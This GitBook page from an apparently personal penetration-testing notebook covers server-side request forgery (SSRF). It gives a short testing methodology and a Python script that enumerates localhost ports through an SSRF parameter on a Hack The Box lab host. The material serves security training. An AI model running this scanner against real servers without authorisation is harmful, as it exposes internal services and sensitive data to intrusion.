🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 🚨Licence and Disclaimer
    • ⚡About Author
    • 📚Bookmarks
  • Fundamentals
    • Basic Commands
      • Linux
      • Git
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
    • Databases
      • MySQL
      • NoSQL
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • 💾Regex
    • Dorks
    • Python Essentials
    • Cryptography
    • Reverse Engineering
    • Tools
      • curl
      • Netcat
      • tcpdump
      • Nmap
      • ffuf
      • Gobuster
      • feroxbuster
      • SQLmap
      • 🦈Wireshark
      • Metasploit
      • GoWitness
      • Crunch
      • NetExec
  • Web Exploitation
    • Recon
    • Main Techniques
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Command Injection
      • SQLi
      • Arbitrary File Upload
      • SSTI
      • LFI
      • XSS
    • Web Servers
      • Apache
      • Nginx
    • Web Services
      • HashiCorp Vault
      • Laravel
      • Express
      • Magento
      • Tiny File Manager
      • Joomla
      • CMS Made Simple
      • Werkzeug
      • 🌵Cacti
      • Tomcat
      • Zabbix
      • OpenNetAdmin
      • Wordpress
      • Java-based web application
        • Struts
        • .WAR
        • JDWP
      • ImageMagick
  • Cloud Exploitation
    • Kubernetes
  • Post Exploitation
    • File Transfer
    • Credential Dumping
      • Thunderbird
    • Pivoting/Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Hijacks
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Escaping Docker
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Web Exploitation
  2. Main Techniques

SSRF

Server Side Request Reforgery

Methodology

  1. Watch for any unexpected redirects, especially to internal or private IP. These can often indicate a vulnerable SSRF endpoint.

  2. Use a listener to see if the server is initiating outbound connections. This helps confirm if the server is making requests to external resources.

  3. Pay special attention to which ports are open on the localhost, as they might indicate internal services that can be targeted.

  4. If you discover that there are open ports on internal services, try querying them via the vulnerable parameter. This could reveal sensitive information, such as metadata, headers, or responses that were not intended to be exposed.

  5. If the SSRF vulnerability exposes endpoints, like internal API, try querying those endpoints from the vulnerable parameter.

Port Scanner

  • Use this script to enumerate open ports on the localhost:

#!/usr/bin/python3
import requests

with open("a", 'wb') as f:
    f.write(b'')

for port in range(1, 65535):
    with open("a", 'rb') as file:
        data_post = {"bookurl": f"http://127.0.0.1:{port}"}   # Vulnerable Parameter
        data_file = {"bookfile": file}    # Mandatory Parameter
    try:
        r = requests.post("http://editorial.htb/upload-cover", files=data_file, data=data_post) # Vunerable URL
        if not r.text.strip().endswith('.jpeg'):     # Filtering response
            print(f"{port} --- {r.text}")
    except requests.RequestException as e:
        print(f"Error on port {port}: {e}")

  • Modify the parameters for your use case.

PreviousSession HijackingNextEval Injection

Last updated 1 month ago